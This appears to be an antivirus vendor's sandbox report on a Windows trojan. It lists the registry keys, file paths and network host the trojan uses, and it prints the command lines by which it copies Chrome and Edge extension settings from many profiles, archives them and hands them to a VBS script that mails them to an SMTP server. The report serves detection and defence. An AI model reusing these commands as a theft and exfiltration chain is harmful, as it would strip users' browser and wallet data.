Trojan.Siggen19.55482

Technical Information

Malicious functions

Searches for registry branches where third party applications store passwords

[<HKCU>\Software\Microsoft\Internet Account Manager]
[<HKLM>\Software\Wow6432Node\Microsoft\Windows Mail]
[<HKCU>\Software\Microsoft\Windows Mail]

Modifies file system

Creates the following files

%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.services.exe
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_68.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_93.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_85.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_77.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_54.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_47.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_31.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_08.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_16.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_84.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_39.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_23.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_78.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_12.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_58.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_81.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\prodefault\list.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\extens.txt
nul
%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe
%LOCALAPPDATA%\google\chrome\user data\--incognito\exclusion.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\firts.extens.services.dat
%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.services.rpm
%TEMP%\a1bb.tmp\super.ff.extens.bat
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_79.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.general(587)dua.vbs

Deletes the following files

%LOCALAPPDATA%\google\chrome\user data\--incognito\extens.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\prodefault\list.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\exclusion.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.general(587)dua.vbs
%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.services.rpm
%LOCALAPPDATA%\google\chrome\user data\--incognito\firts.extens.services.dat
%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe
%TEMP%\a1bb.tmp\super.ff.extens.bat

Substitutes the following files

%LOCALAPPDATA%\google\chrome\user data\--incognito\extens.txt
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_08.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_47.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_77.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_93.096
%LOCALAPPDATA%\google\chrome\user data\--incognito\__rar_39.096

Network activity

Connects to

'sm##.###p2love.mywire.org':587

TCP

Other

'sm##.###p2love.mywire.org':587

UDP

DNS ASK sm##.###p2love.mywire.org

Miscellaneous

Searches for the following windows

ClassName: 'EDIT' WindowName: ''

Creates and executes the following

'%LOCALAPPDATA%\google\chrome\user data\--incognito\super.firts.extens.services.exe'
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro5"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro6"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro7"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro8"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro9"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro10"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro11"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro13"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\EdgeDefaultsync"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro14"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro15"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro16"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro17"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro18"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro19"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro20"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro4"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro12"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro3"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 8\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 1\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 2\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 3\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 4\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 5\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro2"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\EdgeDefault"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro1"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 9\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 10\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 11\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 12\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 13\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r -x@exclusion.txt "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\ProDefault"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 7\Sync Extension Settings"
'%LOCALAPPDATA%\google\chrome\user data\--incognito\tar-extens.exe' a -ep1 -r "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\extens.txt" "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 6\Sync Extension Settings"
'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\A1BB.tmp\super.ff.extens.bat" "' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\A1BB.tmp\super.ff.extens.bat" "
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Sync Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\EdgeDefaultsync" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 20\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro20" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 19\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro19" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 18\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro18" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 17\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro17" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 16\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro16" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 15\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro15" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 14\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro14" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 13\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro13" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 12\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro12" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 11\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro11" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\EdgeDefault" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 10\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro10" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 8\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro8" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 7\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro7" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 6\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro6" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 5\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro5" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 4\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro4" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 3\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro3" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 2\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro2" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 1\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro1" /s /i /Y
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\ProDefault" /s /i /Y
'%WINDIR%\syswow64\find.exe' "TTL="
'%WINDIR%\syswow64\ping.exe' -n 1 8.8.8.8
'%WINDIR%\syswow64\xcopy.exe' "%LOCALAPPDATA%\Google\Chrome\User Data\Profile 9\Local Extension Settings" "%LOCALAPPDATA%\Google\Chrome\User Data\--incognito\Pro9" /s /i /Y
'%WINDIR%\syswow64\cscript.exe' /nologo "super.firts.extens.general(587)dua.vbs" cm@ssh.16mb.com cm@ssh.16mb.com "user extens Firts Powerfull" "s****smtp2love********org" smtp.smtp2love.mywire.org cm@ssh.16mb.com cm@ssh.16mb....

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

Technical Information

Curing recommendations

Free trial